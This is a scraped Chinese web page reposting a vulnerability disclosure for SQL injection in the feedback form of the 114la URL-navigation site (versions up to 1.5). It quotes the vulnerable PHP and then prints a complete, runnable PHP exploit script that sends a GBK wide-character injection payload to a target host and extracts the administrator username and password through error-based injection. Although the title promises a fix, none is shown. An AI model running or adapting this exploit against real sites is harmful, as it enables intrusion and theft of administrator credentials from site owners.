好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

114啦网址导航留言本注入及修复 - 网站安全 - 自

 

漏洞文件feedback/feedback.php 影响版本<=1.5 $username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));     $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';     $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';     (empty($content)) && $error_msg .= ',意见及建议';

    if (!empty($error_msg))     {         throw new Exception($error_msg, 11);     }

    $content = htmlspecialchars($content, ENT_QUOTES);     if (strlen($content) > 600 || strlen($content) < 40)     {         throw new Exception('请将您的描述控制在  20 - 300 字,更多内容请您分次提交。', 1);     }

    // 验证次数     $old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;     if ($old_cookie >= SUBMIT_ONE_DAY)     {         throw new Exception('抱歉,24 小时内您只能提交  ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);     }     $old_cookie++;

    if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),                                                  array($username, $email, $content, time())))     {         throw new Exception('抱歉,信息提交失败,请重试。', 1);     }     else     {         // 记录提交次数         if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)         {             setcookie('dfstime', time(), time() + 86400);             setcookie('fdnum', $old_cookie, time() + 86400);         }         else         {             setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));         }

        throw new Exception('<div class="success">提交成功,感谢您的反馈!<a href="'. URL .'/">返回首页HdhCmsTest2cto测试数据</a></div>', 3);         unset($username, $email, $content);     } 复制代码 $username、$email、$content强制转换GBK编码但是均未过滤直接insert   构造UTF8宽字符形成宽字符注入- 低调求发展( \  s& v1 u: u0 f0 r

EXP <?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: oke 2011.04.02

Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' 127.0.0.1 / ---------------------------------------- '; if ($argc < 3) { print_r($sbcopyright); die(); }

ob_start(); $url = $argv[1]; $path= $argv[2];

$sock = fsockopen("$url", 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\n"); $data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";

fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n"); fwrite($sock, "Accept: */*\r\n"); fwrite($sock, "Referer: http://$url/#M\r\n "); fwrite($sock, "Accept-Language: zh-cn\r\n"); fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n"); fwrite($sock, "Accept-Encoding: gzip, deflate\r\n"); fwrite($sock, "User-Agent: Mozilla\r\n"); fwrite($sock, "Host: $url\r\n"); fwrite($sock, "Content-Length: ".strlen($data)."\r\n"); fwrite($sock, "Connection: Keep-Alive\r\n"); fwrite($sock, "Cache-Control: no-cache\r\n"); fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n"); fwrite($sock, $data);

$headers = ""; while ($str = trim(fgets($sock, 4096)))      $headers .= "$str\n"; echo "\n"; $body = ""; while (!feof($sock))      $body .= fgets($sock, 4096);

fclose($sock);

if (strpos($body, 'Duplicate entry') !== false) { preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr); $result=explode("_",$arr[1]); print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!"); }else{ print_r("Exploit Failed! \n"); }

ob_end_flush(); ?>

查看更多关于114啦网址导航留言本注入及修复 - 网站安全 - 自的详细内容...

  阅读:32次